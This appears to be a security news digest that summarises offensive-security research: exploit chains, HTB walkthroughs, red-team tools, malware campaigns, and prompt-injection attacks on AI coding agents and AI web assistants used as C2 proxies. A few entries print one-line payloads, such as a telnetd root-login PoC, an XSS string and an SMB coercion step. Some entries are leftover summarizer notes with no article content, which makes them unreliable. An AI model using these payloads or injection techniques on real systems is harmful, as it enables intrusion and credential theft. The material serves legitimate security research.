Bitdefender details a 2-stage Android RAT campaign: a TrustBastion dropper (sideloaded via scareware-style lures) shows a fake “update required” dialog, queries trustbastion[.]com for a redirect, then downloads b.apk from a Hugging Face dataset “resolve” link that 302-redirects to cdn-lfs-us-1.hf[.]co. The actors rebuild payloads ~every 15 minutes (>6,000 commits/29 days) for polymorphism. The RAT abuses Accessibility Services + overlays + screen recording/casting to steal credentials (Alipay/WeChat), capture lockscreen inputs, and exfiltrate data to C2 (e.g., 154.198.48.57:5000).

🛡️ CVE | 🍎 macOS | 🧠 Exploit Dev | 💣 RCE

🔗 Original article: https://projectzero.google/2026/01/sound-barrier-2.html

Project Zero explains how to exploit CVE-2024-54529 (CoreAudio/coreaudiod Mach service type confusion). A MIG handler like _XIOContext_Fetch_Workgroup_Port fetches a HALS_Object by ID and assumes it is an ioct object, then performs a virtual call (call qword ptr [rax+0x168]). Exploitation requires a pointer chain: HALS_Object+0x68 → controlled memory, controlled+0x0 → fake vtable, fake vtable+0x168 → target RIP. LLDB backtrace confirms MIG dispatch path and offsets.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://www.offsec.com/blog/cve-2026-24061/

CVE-2026-24061 is a critical auth bypass in GNU InetUtils telnetd (1.9.3–2.7) caused by argv/option injection: telnetd substitutes a %U placeholder with the Telnet NEW_ENVIRON-provided USER env var and passes it to /usr/bin/login without sanitization. Setting USER='-f root' injects login -f root, skipping auth and yielding an immediate root shell. PoC: USER='-f root' telnet -a <ipaddr>. Patch adds sanitize() to reject values starting with - or containing metacharacters.

🛠️ Tool | 🧩 AD | 🧲 NTLM Relay | 🛡️ CVE

🔗 Original article: https://github.com/depthsecurity/RelayKing-Depth/

RelayKing v1.0 is a Python Active Directory NTLM relay detection/enumeration tool that checks SMB/HTTP(S)/LDAP(S)/MSSQL/RPC (plus WIP WinRM/SMTP/IMAP) for relay defenses like SMB signing, LDAP signing, and EPA/CBT (channel binding). It also flags NTLM reflection (CVE-2025-33073), WebClient/WebDAV presence, NTLMv1 support (host/GPO), and coercion vectors (PetitPotam/PrinterBug/DFSCoerce). It can prioritize relay paths and output curated targets for Impacket ntlmrelayx.py; --audit is noisy and likely to trigger EDR/SIEM alerts.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/etr-critical-ivanti-endpoint-manager-mobile-epmm-zero-day-exploited-in-the-wild-eitw-cve-2026-1281-1340

Ivanti disclosed two critical pre-auth RCE code-injection bugs in EPMM: CVE-2026-1281 (confirmed exploited zero-day, KEV-listed; remediation due Feb 1, 2026) and CVE-2026-1340. Attackers send crafted HTTP GET requests to /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/ embedding Bash commands, leading to OS command execution (CVSS 9.8, CWE-94). Includes a vendor regex for hunting, RPM patch trains for 12.x versions, and a public watchTowr PoC reference.

🛠️ Tool | 🪟 Windows | 🛡️ CVE | 💣 RCE

🔗 Original article: https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/

RelayKing is a Python tool that audits an AD domain for NTLM relay/reflection/coercion paths and generates report-ready outputs plus ntlmrelayx-compatible target lists (including per-URL HTTP/HTTPS targets). It enumerates all enabled AD computers, resolves DNS, optionally port-scans default protocol ports, then checks signing and EPA/CBT requirements across SMB/LDAP(S)/HTTP(S)/MSSQL/RPC/WinRM(+more). It also detects WebDAV WebClient, Net-NTLMv1 policy/host exceptions, and NTLM reflection exposure (CVE-2025-33073; plus Server 2025 DC caveats tied to CVE-2025-54918). Includes a very noisy “coerce all” mode.

🛡️ CVE | 🪟 Windows | ⬆️ PrivEsc | 💥 DoS

🔗 Original article: https://unit42.paloaltonetworks.com/iconics-suite-cve-2025-0921/

Unit 42 analyzes CVE-2025-0921 (CVSS 6.5) in Mitsubishi Electric Iconics GENESIS64/Iconics Suite ≤10.97.2 on Windows. PagerCfg.exe stores SMSLogFile in C:\ProgramData\ICONICS\IcoSetup64.ini; with CVE-2024-7587 (GenBroker32 installer makes C:\ProgramData\ICONICS world-writable), a local non-admin can redirect the log path using Windows symlink primitives (Object Manager symlinks + NTFS mount points) to overwrite C:\Windows\System32\cng.sys. When an admin sends an SMS, logs corrupt cng.sys; reboot causes a boot/repair loop (DoS).

🛠️ Tool | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026

Rapid7’s Metasploit Wrap-Up (Jan 30, 2026) announces new Metasploit modules and fixes. Key exploits: FreePBX chains CVE-2025-66039 auth bypass with CVE-2025-61675 SQLi (write to cron_job table → cron-based RCE / admin user creation) or CVE-2025-61678 firmware upload (webshell RCE). Adds Cacti CVE-2025-24367 RCE (Cacti < 1.2.29) and SmarterMail CVE-2025-52691 unauth file upload via guid path traversal (webroot webshell on Windows or /etc/cron.d drop on Linux).

🛠️ Tool | 📡 IoT | 💣 RCE | 🎁 PoC

🔗 Original article: https://github.com/shomykohai/penumbra

Penumbra is a Rust crate + tool for MediaTek (MTK) devices enabling flashing, readback, and (on vulnerable devices) bootloader unlock/relock by changing seccfg. The README includes a PoC-style Rust snippet: poll find_mtk_port(), load a DA (../DA_penangf.bin), init() handshake, check SBC via (target_config & 0x1) != 0, attempt set_seccfg_lock_state(LockFlag::Unlock), and dump lk_a to lk_a.bin. Windows is “half broken” (sometimes needs Zadig/WinUSB); Linux needs libudev, dialout, and/or udev rules.

📡 IoT | 💣 RCE | 🎁 PoC | 🛠️ Tool

🔗 Original article: https://shomy.is-a.dev/blog/article/serving-carbonara

The post explains “Carbonara,” a MediaTek XFlash DA exploit observed in a paid GSM tool and replicated in mtkclient. DA1 verifies DA2 by SHA-256 vs a hash embedded in DA1; the tool issues two BOOT_TO calls and uses an intermediate payload to locate and overwrite the in-memory expected DA2 hash, then sends sha256(DA2) so a patched DA2 executes. A working PoC patch in xflash_lib.py is included. The deeper risk is user-controlled DA2 load address/size enabling unchecked arbitrary memory writes and pre-OS arbitrary payload execution.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/01/31/htb-codetwo.html

HTB CodeTwo is a Flask/Gunicorn app exposing an authenticated JS “sandbox” that executes user code via js2py.eval_js (js2py==0.74). Despite js2py.disable_pyimport(), CVE-2024-28397 allows a sandbox escape by traversing Python objects (__getattribute__ → __class__ → __base__ → object.__subclasses__()) to locate subprocess.Popen and execute OS commands (RCE). The post also notes weak unsalted MD5 password hashing and a sudo npbackup-cli backup-read path to retrieve root’s SSH key.

🛠️ Tool | 📱 Mobile | 🎁 PoC | 🧩 Android

🔗 Original article: https://github.com/KishorBal/deep-C

Deep-C is an Android deep link exploitation framework. It decompiles APKs (apktool, dex2jar, jadx), finds exported/browsable deep link entry points (VIEW + BROWSABLE), and detects risky patterns like weak host validation (contains/endsWith/regex), unsafe custom schemes, and attacker input reaching WebView.loadUrl. It generates (and can auto-run) adb PoCs with external URL and javascript: variants, and can optionally validate exploitability via --ai-review using OpenAI.

Mobile | Tool | MITM | SSL Pinning

🔗 Original article: https://medium.com/@justmobilesec/practical-mobile-traffic-interception-1481e33d974e

Medium content was blocked, so the original article couldn’t be verified. The provided draft describes how mobile interception fails due to trust-store changes, SSL pinning, and Flutter ignoring OS proxy settings, and proposes fixes via CA injection, Frida unpinning, and socket-level redirection (frida4burp), plus iOS options like SSL KillSwitch (global) or Objection (per-app).

Windows | Privesc | Tool | AD

🔗 Original article: https://www.synacktiv.com/en/publications/beyond-acls-mapping-windows-privilege-escalation-paths-with-bloodhound.html

Windows token privileges can bypass normal DACL authorization (e.g., SeBackupPrivilege, SeDebugPrivilege, SeImpersonatePrivilege), enabling credential theft and local privilege escalation. The post covers access tokens, DACL/SACL checks, and UAC filtered vs full tokens (NtFilterToken), then shows how to enumerate privileges/logon rights domain-wide with BloodHound/SharpHound by parsing GPO GptTmpl.inf in SYSVOL or querying LSA over RPC (LsaEnumerateAccountsWithUserRight). Example chain: CanRDP + SeBackupPrivilege -> dump SAM+SYSTEM -> offline secretsdump -> local admin NT hash.

🦠 Malware | 🪟 Windows | 🧩 Loader | 🧬 Supply Chain

🔗 Original article: https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit

Rapid7 analyzed a Lotus Blossom intrusion where a compromised Notepad++ distribution/update path executed notepad++.exe → GUP.exe → a malicious NSIS update.exe. The installer dropped a renamed Bitdefender binary that sideloaded log.dll, which loaded and LCG-decrypted an encrypted BluetoothService shellcode blob to run the Chrysalis backdoor. Chrysalis uses layered decryption, reflective PE-like loading, PEB/API hashing, RC4-encrypted config/traffic, WinInet HTTPS POST C2, service/registry persistence, and commands for reverse shell, process exec, file ops, enumeration, file transfer, and self-removal. TCC was also abused as an in-memory loader.

🛠️ Tool | 🌐 Web | 🤖 AI | 🧰 Burp

🔗 Original article: https://github.com/six2dez/burp-ai-agent

Burp AI Agent is a Java Burp Suite extension that adds AI-assisted request analysis, passive/active scanning across 62 vuln classes, and an MCP server exposing 53+ tools so external MCP clients (e.g., Claude Desktop) can drive Burp. It supports 7 backends (Ollama, LM Studio, OpenAI-compatible HTTP, Gemini/Claude/Codex/OpenCode CLIs), includes privacy modes (STRICT/BALANCED/OFF) for redaction, and produces JSONL audit logs with SHA-256 integrity hashing. Build with Java 21 via Gradle ShadowJar.

🌐 Web | 🛡️ CVE | 💣 RCE | 🧬 Privesc

🔗 Original article: https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html

Only SSH (22) and Squid (3128) are exposed. Using Spose through Squid discovers internal PaperCut NG (9191/9192/9195). CVE-2023-27350 is exploited by visiting /app?service=page/SetupCompleted and clicking login to bypass auth, then enabling print scripting and disabling sandbox to execute code (payload outside printJobHook runs on save) and get a reverse shell as papercut. Priv-esc: pspy reveals root runs /bin/sh /home/papercut/.../server-command; replacing it drops a SUID bash in /tmp and /tmp/0xdf -p yields root.

🛠️ Tool | 🌐 Web | 🤖 AI | 🧪 Pentest

🔗 Original article: https://trustedsec.com/blog/mcp-in-burp-suite-from-enumeration-to-targeted-exploitation

TrustedSec introduces MCP-ASD, a Burp Suite extension for discovering and directly testing MCP (Model Context Protocol) servers over SSE/WebSockets. It passively/optionally actively detects exposed MCP endpoints (light GET probes), connects with tokens/headers/auth params or mTLS, enumerates MCP primitives (Resources/Tools/Prompts), and generates prototype requests. A built-in synchronous bridge proxies Repeater/Intruder traffic, injects auth, rewrites targets to an internal proxy, and correlates async responses via GUIDs—making MCP fuzzing practical.

🛡️ CVE | ☁️ Cloud | 💣 RCE | ⛓️ Cross-Tenant

🔗 Original article: https://omeramiad.com/posts/gatewaytoheaven-gcp-cross-tenant-vulnerability/

CVE-2025-13292 (“GatewayToHeaven”) is a cross-tenant isolation failure in GCP Apigee. The chain: SSRF the Message Processor to 169.254.169.254 (strip X-Forwarded-For with AssignMessage) to steal its SA token; enumerate permissions (gcpwn), snapshot/dump tenant-project disks to find a Dataflow staging bucket; patch/overwrite staged Dataflow JARs (Recaf) for RCE; trigger autoscaling by flooding Pub/Sub; steal the Dataflow SA token via metadata and exfiltrate via GCS (no internet egress); use it to access shared metadata and global analytics “datastores” buckets containing plaintext user tokens.

🛠️ Tool | ⌨️ BadUSB | 🧑‍💻 HID | 🌐 Web

🔗 Original article: https://www.mobile-hacker.com/2026/02/03/sapsan-terminal-ai-powered-badusb-script-generator/

Sapsan Terminal (sapsan-terminal.com) is a web AI tool that generates device-specific HID/BadUSB scripts for 15 devices (Rubber Ducky, Evil Crow Cable, Flipper Zero, etc.) with syntax validation and templates. The author tests: (1) a Rubber Ducky payload opening Notepad, running PowerShell ping, and showing the current Wi‑Fi password—fixed an SSID-parsing bug and corrected STRINGLN→STRING; (2) an Evil Crow Wind Windows+Android payload—fixed Press KEY_LEFT_F11 and removed unsupported comments. No CVEs/PoCs.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://www.tenable.com/blog/google-looker-vulnerabilities-rce-internal-access-lookout

Tenable’s LookOut research (Feb 4, 2026) details two Looker issues: a critical RCE chain abusing LookML remote_dependency handling to path-traverse Git hooksPath, create ../../git_hooks via a crafted ref, force native git (not JGit) using specific POST params, then win a race to rewrite .git/config before git commit so an executable pre-commit hook runs. Also CVE-2025-12743: request-tampering attaches a project to internal MySQL connection looker__ilooker, then error-based SQLi via MySQL updatexml() in LookML tests leaks internal DB data. Upgrade self-hosted Looker.

🛡️ CVE | 🪟 Windows | 💣 RCE | 🛠️ Tool

🔗 Original article: https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/

Amaranth-Dragon (APT-41 nexus) ran targeted 2025 espionage in Southeast Asia and quickly weaponized WinRAR path traversal CVE-2025-8088 (disclosed 2025-08-08) to drop CMD/BAT into Startup for persistence and code execution on reboot. Post-extraction chains use DLL sideloading of a custom Amaranth Loader that fetches an AES key (Pastebin/actor infra), decrypts payloads with AES-CBC + fixed IV, and executes Havoc in memory. A separate chain deploys TGAmaranth (Telegram-bot RAT) with anti-debug and ntdll unhooking.

🎣 Phishing | 🛡️ CVE | 🧬 Rootkit | 🛠️ Tool

🔗 Original article: https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/

Unit 42 profiles TGR-STA-1030 (UNC6619), a state-aligned espionage cluster running “Shadow Campaigns” with phishing, N-day exploitation (incl. CVE-2019-11580), and extensive post-compromise tooling. A Feb 2025 ZIP lure drops the “Diaoyu” loader, which uses anti-sandbox guardrails (≥1440px width + required zero-byte pic1.png) before downloading GitHub-hosted stages that lead to Cobalt Strike. The actor uses VShell/Cobalt Strike, Behinder/Neo-reGeorg/Godzilla web shells, GOST/FRPS/IOX tunnels, and a Linux eBPF rootkit (ShadowGuard) that hides PIDs/files via custom kill signals and “swsecret” artifact names.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://www.thezdi.com/blog/2026/2/4/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall

Arista NG Firewall (formerly Untangle) has an authenticated JSON-RPC command injection in NetworkManagerImpl.runTroubleshooting() (post text covers CVE-2025-6798; title references CVE-2025-6978). User-controlled JSON params become KEY=value env vars passed to network-troubleshooting.sh, which builds a CMD string and executes it via eval. The app blocks ; & | > $( but misses backticks, enabling root command execution via crafted HOST/URL values. Includes detection regex and guidance; fixed in 17.4+.

🌐 Web | 🛠️ Tool | 🪪 JWT | 🚪 Auth Bypass

🔗 Original article: https://trustedsec.com/blog/keys-to-jwt-assessments-from-a-cheat-sheet-to-a-deep-dive

TrustedSec explains how JWT/JWS stateless sessions work and how to test/abuse common JWT implementation flaws to forge tokens and escalate privileges. It details a Burp-centric workflow (JWT Editor) plus CLI tooling (jwt_tool, hashcat) to: locate JWTs via regex, decode claims (exp/alg/role/id), sanity-check signature validation, crack HS256 secrets, test alg=none, attempt RS256↔HS256 key confusion, inject jwk/jku/x5u with Burp Collaborator detection, and abuse kid-based key selection/path traversal.

🛡️ CVE | 💉 XSS | 🎁 PoC | 🌐 Web

🔗 Original article: https://github.com/advisories/GHSA-8hf7-h89p-3pqj

MobSF (< 4.4.5) has a Stored XSS (CVE-2026-24490 / GHSA-8hf7-h89p-3pqj) in Android manifest analysis. android:host from <data android:scheme="android_secret_code"> is extracted, interpolated into a finding title via %s, and rendered with Django |safe, executing attacker HTML/JS when a victim views the report. PoC uses android:host="<img src=x onerror=alert(document.domain)>". Fixed in 4.4.5.

🛠️ Tool | 🤖 Android | 🧬 Reverse Engineering | 🎁 PoC

🔗 Original article: https://github.com/TheQmaks/clsdumper

clsdumper is a Frida-based Android runtime DEX dumping tool. It attaches/spawns an app on a rooted device (with frida-server) and extracts all DEX it can find using 9 strategies (ART structure walking, hooks like DexFile::OpenCommon/DefineClass, memory scanning, OAT/VDEX parsing, and Java ClassLoader reflection/hooks). It also includes anti-Frida bypasses (sigaction/signal, /proc/self/maps filtering via memfd_create, watchdog neutralization via pthread_create). Install: pip install clsdumper; run: clsdumper <pkg|pid> [--spawn].

💣 RCE | ⏱️ TOCTOU | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://johnstawinski.com/2026/02/05/trusting-claude-with-a-knife-unauthorized-prompt-injection-to-rce-in-anthropics-claude-code-action/

A CVSS 7.7 (High) vuln chain in Anthropic’s Claude Code Action allows external attackers to get RCE in GitHub Actions via TOCTOU + PR-title prompt injection. Submit a benign PR, wait for a maintainer to trigger @claude, then race-edit the PR title to injected instructions that make Claude overwrite /home/runner/.bun/bin/bun with env|base64; exit 1. When the workflow later runs bun run ..., the payload executes and leaks env/secrets in logs. Fix shipped Jan 8, 2026 (PR #793).

🪟 Windows | 🛡️ Kerberos | 💣 RCE | 🛠️ Tool

🔗 Original article: https://0xdf.gitlab.io/2026/02/07/htb-signed.html

Start with SQL-only creds (scott). Use xp_dirtree \\attacker\share to coerce SMB auth from SIGNED\\mssqlsvc, capture NetNTLMv2 with Responder, and crack it with hashcat (5600) to purPLE9795!@. Compute NTLM (MD4 UTF-16LE), parse domain SID from SUSER_SID, and forge an MSSQL silver ticket (Impacket ticketer.py) injecting IT group RID 1105 to become SQL sysadmin. Enable xp_cmdshell for OS command execution as signed\\mssqlsvc, then pivot with Chisel SOCKS + proxychains.

🛠️ Tool | 🪟 Windows | 🔐 Auth | 🌐 Web

🔗 Original article: https://github.com/durck/impacket

Impacket is a Python library + example tools for low-level packet crafting/parsing and higher-level implementations of SMB1-3 and MSRPC (DCE/RPC v5). It supports Plain/NTLM/Kerberos auth using passwords, hashes, tickets, and keys, and implements many MSRPC interfaces plus portions of LDAP and MSSQL (TDS). Install via python3 -m pipx install impacket (stable v0.13.0) or dev via python3 -m pipx install . (v0.14.0-dev). Docker build/run commands are included. No single CVE/exploit PoC is described.

🪟 Windows | 🌐 AD | 🪓 Kerberos | 🛠️ Tool

🔗 Original article: https://0xdf.gitlab.io/2026/02/10/htb-breach.html

Guest SMB write access is abused to upload ntlm_theft lure files to a browsed share, forcing outbound NTLM auth that Responder captures as NetNTLMv2 for BREACH\Julia.Wong. Hashcat cracks it (mode 5600) to recover Computer1. RustHound-CE + BloodHound-CE identify a Kerberoastable SPN account svc_mssql; NetExec LDAP extracts a $krb5tgs$23$ blob and hashcat cracks it (mode 13100) to recover Trustno1. Both accounts can auth to MSSQL; the post states an intended silver ticket → xp_cmdshell → GodPotato chain to SYSTEM.

🛠️ Tool | 📱 Android | 🥷 Termux | 🕹️ C2

🔗 Original article: https://github.com/androidmalware/OpenClaw_Termux

A Termux automation repo that installs Ubuntu via proot-distro (no root), then installs Node.js 22 + OpenClaw, runs openclaw onboard, and starts the OpenClaw Gateway so the operator can “chat” with the device via WhatsApp/Telegram/Discord. Setup uses Termux:API (from F-Droid) to access device features (calls, notifications, photos, SMS). No CVEs are discussed; it’s a post-access mobile C2/deployment technique.

📱 Mobile | 🌐 Web | 💉 XSS | 🛠️ Tool

🔗 Original article: https://djini.ai/intro-to-android-webviews-and-deep-links-and-how-to-exploit-them/

Android apps often let deep links control in-app WebViews. In Samsung Gaming Hub v7.1.01.7, a BROWSABLE deep link reaches GmpWebActivity and loads the attacker-supplied url without sanitization/whitelisting. JavaScript becomes enabled only if GmpWebViewModel.F(String) approves the URL via naive startsWith checks against prefixes like https://us.mcsvc.samsung.com, enabling bypass with domains such as us.mcsvc.samsung.com.attacker.com and yielding in-app arbitrary JS execution. The post also gives a WebView exploitation checklist and mentions Djini for analysis.

📡 IoT | 🌐 Web | 🛡️ Vulnerability | 🧭 OSINT

🔗 Original article: https://www.pentestpartners.com/security-blog/shelly-iot-door-controller-config-fail-leaving-your-garage-home-and-security-exposed/

Shelly Gen 4 devices (e.g., Shelly 1 Gen 4) may leave their default open commissioning Wi‑Fi AP enabled after joining the home/IoT Wi‑Fi. A nearby attacker can connect to the AP and trigger relays via unauthenticated HTTP (e.g., http://192.168.33.1/relay/0?turn=on), potentially opening garage doors/gates. Compromise can pivot into the internal network using Shelly scripting (HTTP.GET) to control other Shellys. Targets can be geolocated via wigle.net. Mitigation: disable AP in Settings → Access Point.

🛡️ Supply Chain | 💣 RCE | 🧩 DLL Sideloading | 🪟 Windows

🔗 Original article: https://unit42.paloaltonetworks.com/notepad-infrastructure-compromise/

Unit 42 reports a targeted supply-chain compromise of Notepad++ update infrastructure (June–Dec 2025) after a shared hosting breach. Older WinGUp updater verification gaps enabled malicious manifests to redirect victims to a trojan NSIS “update.exe”. Two chains were observed: DLL sideloading via signed Bitdefender BluetoothService.exe loading log.dll to decrypt/execute the Chrysalis backdoor (Warbird + API hashing), and NSIS→Lua script execution with shellcode injection (EnumWindowStationsW) delivering Cobalt Strike Beacon. Includes C2 IOCs and multiple Cortex XDR XQL hunts plus mitigation guidance (8.9.1/8.8.9+, XMLDSig, signature enforcement in 8.9.2).

🪟 Windows | 🛡️ UAC | 💥 EoP | 🎁 PoC

🔗 Original article: https://projectzero.google/2026/02/windows-administrator-protection.html

Project Zero explains how Windows UIAccess (needed for accessibility) can be abused to silently create a High-integrity process via UAC’s RAiLaunchAdminProcess, undermining Administrator Protection. It details UIPI/Integrity Levels, UIAccess token rules, and why High IL enables compromising other High-IL processes (e.g., windows hooks/DLL injection, including via COM message-only windows). It also covers secure-directory check weaknesses (appinfo.dll/AiCheckSecureApplicationDirectory), a historical NTFS directory named-stream bypass, writable upgrade artifacts (Tasks_Migrated), and a fixed MSIX-to-WindowsApps placement issue. Includes a PowerShell enumeration command (Get-AccessibleFile).

🌐 Web | 🛠️ Tool | 💣 RCE | 👨‍💻 Linux

🔗 Original article: https://0xdf.gitlab.io/2026/02/12/htb-slonik.html

An HTB Slonik writeup chaining NFS export escape (via no_subtree_check) to read /etc/shadow and service dotfiles using NFS UID spoofing (sudo -u '#1337'). Cracked creds allow SSH tunneling even with /bin/false, forwarding 5432 to Postgres’ UNIX socket. As postgres, COPY ... FROM PROGRAM gives OS command execution and writes authorized_keys for SSH. Root comes from poisoning a root cron pg_basebackup so a SUID bash becomes root:root, then ./bash -p.

🛠️ Tool | 🎁 PoC | 💣 RCE | 🌐 Web

🔗 Original article: https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon

PoC custom Linux Cobalt Strike Beacon written in C that talks to a Cobalt Strike Team Server over HTTP/S using the default C2 profile. Implements tasking like shell, upload/download, and supports Linux BOF execution via TrustedSec ELFLoader (TrustedSec & Outflank BOFs) plus a SOCKS proxy for pivoting. Includes an Aggressor script (CustomBeacon.cna) and demo GIFs. Not a CVE—an offensive implant/tool.

🎣 Phishing | 📱 Mobile | 🌐 Web | 🧪 Malware

🔗 Original article: https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/

Unit 42 (Feb 13, 2026) explains how QR codes enable “quishing” beyond simple URLs: attackers use QR shorteners for dynamic, reputation-abusing redirect chains; embed in-app deep links (e.g., tg://login?token=…, wa.me/settings/linked_devices#…) to trigger native app authorization/payment flows enabling account takeover and fraud; and distribute Android malware by linking directly to APK downloads (59k pages, 1,457 APKs), bypassing app store review and requesting risky permissions (location/audio/storage/install packages). Includes extensive IoCs and payload examples (VCARD/VCALENDAR/WIFI).

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/02/14/htb-soulmate.html

HTB “Soulmate” chains two CrushFTP admin auth-bypass CVEs (CVE-2025-31161 / CVE-2025-54309) to create an admin user, mount the web directory (/app/webProd) in CrushFTP, upload a PHP webshell, and pop a reverse shell as www-data. Post-exploit, a root-run Erlang escript starts an SSH daemon on localhost:2222 and contains hardcoded creds (ben / HouseH0ldings998), enabling pivot to ben via su or SSH.

🛠️ Tool | 📱 Android | 🕵️ Evasion | 🔧 Reverse

🔗 Original article: https://github.com/TheQmaks/phantom-frida

phantom-frida is a tool to build a stealth Frida server from source by applying ~90 patches across 4 phases (source/targeted/post-build/binary). It preserves the Frida protocol so stock frida-tools can connect, but it removes common app-side detection fingerprints: process/library/thread names, memfd labels, exported symbols (frida_agent_main), SELinux labels, D-Bus service names, and (extended mode) port, temp paths, internal symbols, GTypes, and binary string sweeps. Includes WSL + GitHub Actions builds and ADB deploy commands.

🛠️ Tool | 🌐 Web

🔗 Original article: https://www.yeswehack.com/en/blog/xml-external-entity-guide-xxe

The included “blog content” is only a 404 page, so there’s no XXE article text to improve or verify. The current XXE summary can’t be validated against the provided source. Provide the actual article content (HTML/text/screenshot) to generate an accurate, technical, actionable summary.

CVE | Web | RCE | PoC

🔗 Original article: https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/

TRUfusion Enterprise can be compromised by chaining a reverse-proxy full-read SSRF (CVE-2025-32355) with an Axis2 SOAP upload path traversal/arbitrary file write (CVE-2025-59793). The SSRF can reach a localhost-only Axis2 service; with commonly unchanged default creds (admin:trubiquity), attackers can write a JSP into Tomcat webapps and execute it for RCE.

Tool | Android | Python | Web

🔗 Original article: https://github.com/TheQmaks/justapk

justapk is a Python 3.11+ CLI/library that downloads Android APKs by package name using 6 sources with automatic fallback. It mixes APIs, reverse-engineered mobile APIs, and HTML scraping; for some Cloudflare-protected sources it uses curl_cffi with TLS fingerprint impersonation. It supports download/search/info/convert/sources; convert merges split APKs/XAPK into one APK and re-signs with a debug key. CLI outputs JSON to stdout and progress to stderr.

🌐 Web | 📡 C2 | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2026/ai-in-the-middle-turning-web-based-ai-services-into-c2-proxies-the-future-of-ai-driven-attacks/

Check Point Research shows a service-abuse PoC where web AI assistants with URL fetching (Grok, Microsoft Copilot) can be turned into covert C2 proxies without API keys/accounts. A C++ implant uses WebView2 to drive the AI web UI, prompts it to “summarize” an attacker HTTPS page, exfiltrates data via URL query parameters (often encoded/encrypted to bypass safeguards), and receives commands embedded in returned HTML (demo executes calc).

Tool | Android | Web | API

🔗 Original article: https://github.com/zahidaz/jezail

Jezail is a rooted-Android pentesting/device-management toolkit that runs on-device and exposes control via an HTTP REST API and embedded Flutter Web UI on port 8080. Install with adb install -g -r jezail.apk, then access http://<device-ip>:8080/, /api/json, or /api/swagger. On emulators, use adb forward tcp:8080 tcp:8080 and browse http://localhost:8080. No CVEs or exploit PoCs are included in the provided content.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: http://www.tenable.com/blog/google-looker-vulnerabilities-rce-internal-access-lookout

Tenable’s “LookOut” research (Feb 4, 2026) details two Looker bugs: an RCE chain abusing LookML remote dependencies to path-traverse Git’s hooksPath, create ../../git_hooks via clone/ref directory creation, clone an attacker repo containing an executable pre-commit hook (preserved with git update-index --chmod=+x), then win a race to overwrite .git/config right before a native git commit (forced via specific POST params) executes the hook. CVE-2025-12743 lets attackers attach to internal MySQL connection looker__ilooker by request tampering and dump internal DB via error-based SQLi using updatexml().

🛠️ Tool | 🧩 Active Directory | 🕵️ Recon | 🛡️ EDR Evasion

🔗 Original article: https://github.com/mverschu/adwsdomaindump

ADWSDomainDump is an Active Directory recon tool (fork of LDAPDomainDump) that performs “domain dump” enumeration via ADWS on TCP/9389 instead of LDAP, aiming to evade detections. Install: pipx install .. Example: adwsdomaindump -u 'thewoods.local\\user' -p 'password' -n 10.10.10.1 dc01.thewoods.local (checks 9389, binds, dumps). --force skips the port check. Claims bypass tests vs MDE and CrowdStrike. No CVEs.

🛡️ CVE | 💣 RCE | 🌐 Web | 🕵️ Detection

🔗 Original article: https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/

Unit 42 reports active exploitation of Ivanti EPMM zero-days CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8) enabling unauthenticated RCE via Apache RewriteMap-invoked bash scripts. CVE-2026-1281 abuses bash arithmetic evaluation in /mi/bin/map-appstore-url: set st=theValue (stored in gStartTime) and craft h so theValue contains gPath['sleep 5'], which executes during [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]. Post-exploitation includes /slt payloads, reverse shells, and JSP web shells in /mi/tomcat/webapps/mifs/. Includes XQL detection queries + IOCs.

🛡️ Crypto | 🧨 Nonce/IV Reuse | 🧩 AES-CTR | 🔐 Keys/Certs

🔗 Original article: https://blog.trailofbits.com/2026/02/18/carelessness-versus-craftsmanship-in-cryptography/

Trail of Bits shows how aes-js and pyaes make AES-CTR dangerously easy to misuse by defaulting the IV to a constant (0x…0001). CTR key/IV reuse leaks plaintext relations (C1⊕C2 = P1⊕P2) and enables keystream recovery from known plaintext. A real case: strongMan encrypted PKCS#8 RSA keys and X.509 certs in SQLite with the same key/IV, allowing private key recovery and impersonation/MITM if the DB is stolen. Fix: migrate to GCM-SIV, enforce tag checks, and per-entry KDF.

Mobile | Malware | Hooking | Defense

🔗 Original article: https://blog.azzahid.com/posts/android-app-virtualization/

The actual post text wasn’t retrievable (JS/cookie gate shown), so this refines the provided summary without adding unverifiable claims. It explains Android app-level virtualization where a host loads/instruments guest apps, often sharing the host UID so guests inherit host permissions. Covers baseline install/launch (base.apk, Zygote, DexFile.openDexFileNative), typical hooking/storage redirection, threat models (evil host/guest), detection via /proc/<pid>/maps (multiple base.apk, Frida traces) and crash-behavior checks, plus mitigations (Play Integrity, AVF).

🛡️ CVE | 💣 RCE | 📡 IoT | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed

